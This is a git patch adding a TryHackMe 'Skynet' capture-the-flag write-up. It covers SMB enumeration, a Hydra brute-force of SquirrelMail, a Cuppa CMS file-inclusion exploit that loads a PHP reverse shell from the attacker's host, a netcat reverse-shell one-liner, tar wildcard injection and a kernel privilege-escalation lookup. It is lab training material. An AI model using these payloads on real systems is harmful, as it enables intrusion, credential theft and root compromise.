From b01e0e8f8ded088a86d969ee811b31f9b5c9d974 Mon Sep 17 00:00:00 2001 From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Mon, 26 Oct 2020 18:47:38 +0500 Subject: [PATCH] Add files via upload --- TryHackMe/Skynet.md | 470 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 470 insertions(+) create mode 100644 TryHackMe/Skynet.md diff --git a/TryHackMe/Skynet.md b/TryHackMe/Skynet.md new file mode 100644 index 0000000..e745a4a --- /dev/null +++ b/TryHackMe/Skynet.md @@ -0,0 +1,470 @@ +# TryHackMe-Skynet + +>Abdullah Rizwan , Sunday 25th October,05:36 PM + +## NMAP + +``` +Nmap scan report for 10.10.209.122 +Host is up (0.18s latency). +Not shown: 994 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA) +| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA) +|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519) +80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) +|_http-server-header: Apache/2.4.18 (Ubuntu) +|_http-title: Skynet +110/tcp open pop3 Dovecot pop3d +|_pop3-capabilities: SASL TOP RESP-CODES CAPA AUTH-RESP-CODE PIPELINING UIDL +139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) +143/tcp open imap Dovecot imapd +|_imap-capabilities: capabilities SASL-IR Pre-login IDLE IMAP4rev1 have OK ID LOGIN-REFERRALS listed LOGINDISABLEDA0001 more ENABLE LITERAL+ post-lo +gin +445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) +Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Host script results: +|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s +|_nbstat: NetBIOS name: SKYNET, NetBIOS user: , NetBIOS MAC: (unknown) +| smb-os-discovery: +| OS: Windows 6.1 (Samba 4.3.11-Ubuntu) +| Computer name: skynet +| NetBIOS computer name: SKYNET\x00 +| Domain name: \x00 +| FQDN: skynet +|_ System time: 2020-10-25T07:36:04-05:00 +| smb-security-mode: +| account_used: guest +| authentication_level: user +| challenge_response: supported +|_ message_signing: disabled (dangerous, but default) +| smb2-security-mode: +| 2.02: +|_ Message signing enabled but not required +| smb2-time: +| date: 2020-10-25T12:36:04 +|_ start_date: N/A + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 23.50 seconds +``` + +From the nmap result we can see the following ports are open + +* PORT 22 +* PORT 80 +* PORT 110 +* PORT 445 + +which we can enumerate + + +#### PORT 445 + +``` +root@kali:~/TryHackMe/Easy/Skynet# smbmap -u anonymous -H 10.10.209.122 +[+] Guest session IP: 10.10.209.122:445 Name: 10.10.209.122 + Disk Permissions Comment + ---- ----------- ------- + print$ NO ACCESS Printer Drivers + anonymous READ ONLY Skynet Anonymous Share + milesdyson NO ACCESS Miles Dyson Personal Share + IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu)) + +``` +Here we can see only `anonymous` share is readable + +``` +smbclient \\\\10.10.209.122\\anonymous +Enter WORKGROUP\root's password: +Try "help" to get a list of possible commands. +smb: \> dir + . D 0 Wed Sep 18 09:41:20 2019 + .. D 0 Tue Sep 17 12:20:17 2019 + attention.txt N 163 Wed Sep 18 08:04:59 2019 + logs D 0 Wed Sep 18 09:42:16 2019 + books D 0 Wed Sep 18 09:40:06 2019 + + 9204224 blocks of size 1024. 5372244 blocks available +smb: \> get attention.txt +getting file \attention.txt of size 163 as attention.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) + +``` + +`A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. +-Miles Dyson +` + +Head over to `\logs` in smbshare here you will find 3 text files +``` +smb: \> cd logs +smb: \logs\> dir + . D 0 Wed Sep 18 09:42:16 2019 + .. D 0 Wed Sep 18 09:41:20 2019 + log2.txt N 0 Wed Sep 18 09:42:13 2019 + log1.txt N 471 Wed Sep 18 09:41:59 2019 + log3.txt N 0 Wed Sep 18 09:42:16 2019 + + 9204224 blocks of size 1024. 5373956 blocks available + +``` +This pretty much doesn't give anything + + + +Only `log1.txt` has some potential passwords + + + + +#### PORT 80 + + + + + + +#### Gobuster + +``` +gobuster dir -u http://10.10.209.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt +=============================================================== +Gobuster v3.0.1 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) +=============================================================== +[+] Url: http://10.10.209.122 +[+] Threads: 10 +[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt +[+] Status codes: 200,204,301,302,307,401,403 +[+] User Agent: gobuster/3.0.1 +[+] Timeout: 10s +=============================================================== +2020/10/25 18:03:31 Starting gobuster +=============================================================== +/admin (Status: 301) +/css (Status: 301) +/js (Status: 301) +/config (Status: 301) +/ai (Status: 301) +/squirrelmail (Status: 301) +Progress: 21226 / 220561 (9.62%) +``` + + + + +hydra -l miles -P log1.txt http-post-from 10.10.209.122 "/squirrelmail/src/redirect.php:login_username=^USER^ & secretkey=^PASS^&Login=Unknown user or password incorrect." + + +#### Hydra + + +``` +root@kali:~/TryHackMe/Easy/Skynet# hydra -l milesdyson -P log1.txt 10.10.209.122 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^ & secretkey=^PASS^&Login=Login:Unknown user or password incorrect." -V + +Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-25 18:24:12 +[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task +[DATA] attacking http-post-form://10.10.209.122:80/squirrelmail/src/redirect.php:login_username=^USER^ & secretkey=^PASS^&Login=Login:Unknown user or password incorrect. +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "cyborg007haloterminator" - 1 of 31 [child 0] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator22596" - 2 of 31 [child 1] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator219" - 3 of 31 [child 2] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator20" - 4 of 31 [child 3] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator1989" - 5 of 31 [child 4] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator1988" - 6 of 31 [child 5] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator168" - 7 of 31 [child 6] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator16" - 8 of 31 [child 7] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator143" - 9 of 31 [child 8] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator13" - 10 of 31 [child 9] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator123!@#" - 11 of 31 [child 10] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator1056" - 12 of 31 [child 11] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator101" - 13 of 31 [child 12] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator10" - 14 of 31 [child 13] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator02" - 15 of 31 [child 14] (0/0) +[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator00" - 16 of 31 [child 15] (0/0) +[80][http-post-form] host: 10.10.209.122 login: milesdyson password: cyborg007haloterminator +1 of 1 target successfully completed, 1 valid password found +Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-25 18:24:24 + + +``` + +username :`milesdyson` password: `cyborg007haloterminator` + + + + + + + +``` +We have changed your smb password after system malfunction. +Password: )s{A&2Z=F^n_E.B` +``` + +Now we go back to smb shares + +``` + smbmap -u milesdyson -p ')s{A&2Z=F^n_E.B`' -H 10.10.209.122 +[+] IP: 10.10.209.122:445 Name: 10.10.209.122 + Disk Permissions Comment + ---- ----------- ------- + print$ READ ONLY Printer Drivers + anonymous READ ONLY Skynet Anonymous Share + milesdyson READ ONLY Miles Dyson Personal Share + IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu)) + +``` + +`smbclient \\\\10.10.209.122\\milesdyson -U milesdyson` enter password ``` )s{A&2Z=F^n_E.B` ``` + + + +``` +smb: \> dir + . D 0 Tue Sep 17 14:05:47 2019 + .. D 0 Wed Sep 18 08:51:03 2019 + Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:05:14 2019 + Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:05:14 2019 + Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:05:14 2019 + notes D 0 Tue Sep 17 14:18:40 2019 + Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:05:14 2019 + Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:05:14 2019 + + 9204224 blocks of size 1024. 5367008 blocks available + + +``` + +We see `notes` directory + +``` +smb: \> cd notes [9/775] +smb: \notes\> dir + . D 0 Tue Sep 17 14:18:40 2019 + .. D 0 Tue Sep 17 14:05:47 2019 + 3.01 Search.md N 65601 Tue Sep 17 14:01:29 2019 + 4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:01:29 2019 + 2.08 In Practice.md N 7949 Tue Sep 17 14:01:29 2019 + 0.00 Cover.md N 3114 Tue Sep 17 14:01:29 2019 + 1.02 Linear Algebra.md N 70314 Tue Sep 17 14:01:29 2019 + important.txt N 117 Tue Sep 17 14:18:39 2019 + 6.01 pandas.md N 9221 Tue Sep 17 14:01:29 2019 + 3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:01:29 2019 + 2.01 Overview.md N 1165 Tue Sep 17 14:01:29 2019 + 3.02 Planning.md N 71657 Tue Sep 17 14:01:29 2019 + 1.04 Probability.md N 62712 Tue Sep 17 14:01:29 2019 + 2.06 Natural Language Processing.md N 82633 Tue Sep 17 14:01:29 2019 + 2.00 Machine Learning.md N 26 Tue Sep 17 14:01:29 2019 + 1.03 Calculus.md N 40779 Tue Sep 17 14:01:29 2019 + 3.03 Reinforcement Learning.md N 25119 Tue Sep 17 14:01:29 2019 + 1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 14:01:29 2019 + 1.06 Bayesian Statistics.md N 39554 Tue Sep 17 14:01:29 2019 + 6.00 Appendices.md N 20 Tue Sep 17 14:01:29 2019 + 1.01 Functions.md N 7627 Tue Sep 17 14:01:29 2019 + 2.03 Neural Nets.md N 144726 Tue Sep 17 14:01:29 2019 + 2.04 Model Selection.md N 33383 Tue Sep 17 14:01:29 2019 + 2.02 Supervised Learning.md N 94287 Tue Sep 17 14:01:29 2019 + 4.00 Simulation.md N 20 Tue Sep 17 14:01:29 2019 + 3.05 In Practice.md N 1123 Tue Sep 17 14:01:29 2019 + 1.07 Graphs.md N 5110 Tue Sep 17 14:01:29 2019 + 2.07 Unsupervised Learning.md N 21579 Tue Sep 17 14:01:29 2019 + 2.05 Bayesian Learning.md N 39443 Tue Sep 17 14:01:29 2019 + 5.03 Anonymization.md N 2516 Tue Sep 17 14:01:29 2019 + 5.01 Process.md N 5788 Tue Sep 17 14:01:29 2019 + 1.09 Optimization.md N 25823 Tue Sep 17 14:01:29 2019 + 1.05 Statistics.md N 64291 Tue Sep 17 14:01:29 2019 + +``` + +Reading the contents of `important.txt` +``` +1. Add features to beta CMS /45kra24zxs28v3yd +2. Work on T-800 Model 101 blueprints +3. Spend more time with my wife + +``` + +Again running gobuster on the hidden directory +``` +gobuster dir -u http://10.10.209.122/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt +=============================================================== +Gobuster v3.0.1 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) +=============================================================== +[+] Url: http://10.10.209.122/45kra24zxs28v3yd/ +[+] Threads: 10 +[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt +[+] Status codes: 200,204,301,302,307,401,403 +[+] User Agent: gobuster/3.0.1 +[+] Timeout: 10s +=============================================================== +2020/10/25 19:08:35 Starting gobuster +=============================================================== +/administrator (Status: 301) +Progress: 6554 / 220561 (2.97%) + + +``` + + + + + +``` +searchsploit cuppa +------------------------------------------------------------------------------------------------------------------ --------------------------------- + Exploit Title | Path +------------------------------------------------------------------------------------------------------------------ --------------------------------- +Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt +------------------------------------------------------------------------------------------------------------------ --------------------------------- +``` + +We can see that + +``` +An attacker can exploit this issue with a browser. + +The following example URIs are available: + +http://www.example.com/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt? +http://www.example.com/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd + +``` + +So using the concept of RFI (Remote File Inclusion) we can include a any remote file since LFI (Local File Inclusion) vulnerability exists. + +#### LFI +`http://10.10.209.122/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd` + +#### RFI + +Grab a reverse shell from pentest monkey `https://github.com/pentestmonkey/php-reverse-shell` + +Change the ip and port and then start a http server along with a listener + +`nc -lvp [port]` + +`python3 -m http.server 8000 +Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ` + +`10.10.209.122/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.3.143:8000/php-reverse-shell.php` + +This will be your RFI + + +#### Reverse Shell + + + + +#### Privilege Escalation + + +###### Method 1 + + + +Here we can see `tar cf /home/milesdyson/backups/backup.tgz *` so this wildcard makes this command to be vulnerable + +https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/ + +Execute these commands on the target machine + +mkfifo /tmp/lhennp; nc 10.14.3.143 5555 0/tmp/lhennp 2>&1; rm /tmp/lhennp +echo "" > "--checkpoint-action=exec=sh shell.sh" +echo "" > --checkpoint=1 +tar cf archive.tar * + + +Then set up netcat listener + +nc -lvp 5555 + +``` +id +uid=0(root) gid=0(root) groups=0(root) +ls -la +total 80 +drwxr-xr-x 8 www-data www-data 4096 Oct 26 08:26 . +drwxr-xr-x 3 root root 4096 Sep 17 2019 .. +drwxr-xr-x 3 www-data www-data 4096 Sep 17 2019 45kra24zxs28v3yd +drwxr-xr-x 2 www-data www-data 4096 Sep 17 2019 admin +drwxr-xr-x 3 www-data www-data 4096 Sep 17 2019 ai +-rw-rw-rw- 1 www-data www-data 0 Oct 26 08:02 archive.tar +-rw-rw-rw- 1 www-data www-data 1 Oct 26 08:02 --checkpoint=1 +-rw-rw-rw- 1 www-data www-data 1 Oct 26 08:02 --checkpoint-action=exec=sh shell.sh +drwxr-xr-x 2 www-data www-data 4096 Sep 17 2019 config +drwxr-xr-x 2 www-data www-data 4096 Sep 17 2019 css +-rw-r--r-- 1 www-data www-data 25015 Sep 17 2019 image.png +-rw-r--r-- 1 www-data www-data 523 Sep 17 2019 index.html +drwxr-xr-x 2 www-data www-data 4096 Sep 17 2019 js +-rwxrwxrwx 1 www-data www-data 100 Oct 26 08:26 shell.sh +-rw-r--r-- 1 www-data www-data 2667 Sep 17 2019 style.css +cd /root +ls -la +total 28 +drwx------ 4 root root 4096 Sep 17 2019 . +drwxr-xr-x 23 root root 4096 Sep 18 2019 .. +lrwxrwxrwx 1 root root 9 Sep 17 2019 .bash_history -> /dev/null +-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc +drwx------ 2 root root 4096 Sep 17 2019 .cache +drwxr-xr-x 2 root root 4096 Sep 17 2019 .nano +-rw-r--r-- 1 root root 148 Aug 17 2015 .profile +-rw-r--r-- 1 root root 33 Sep 17 2019 root.txt + + +``` +###### Method 2 +You can go the other way around in rooting the box by checking the kernel version + +``` +www-data@skynet:/home/milesdyson$ uname -vr +4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 +www-data@skynet:/home/milesdyson$ uname +Linux +www-data@skynet:/home/milesdyson$ uname -vvv +#63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 +www-data@skynet:/home/milesdyson$ + +``` + +Here the kernel version is `4.8.0` nad ubuntu version is `16.04.1` + + +``` +root@kali:~/TryHackMe/Medium/Skynet# searchsploit 4.8.0 +------------------------------------------------------------------------------------------------------------------ --------------------------------- + Exploit Title | Path +------------------------------------------------------------------------------------------------------------------ --------------------------------- +Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) | linux/remote/42695.rb +eToolz 3.4.8.0 - Denial of Service (PoC) | windows_x86-64/dos/45797.py +Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow | windows/remote/10269.html +iCAM Workstation Control 4.8.0.0 - Authentication Bypass | windows/local/32158.txt +Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit) | linux/local/44654.rb +Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c +Linux Kernel 4.8.0-22/3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference | linux/dos/40762.c +Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation | linux/local/47168.c +Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation | linux/local/41994.c +Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c +Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR | linux/local/47169.c +phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery | php/webapps/44496.html +Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) | windows/local/48695.py +------------------------------------------------------------------------------------------------------------------ --------------------------------- +``` + +Here `Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation` stands perfect exploit + +copy to your directory or download it from `exploit-db` then host it on your local machine + + + +Compile the program + + + + + +And you got root !!! \ No newline at end of file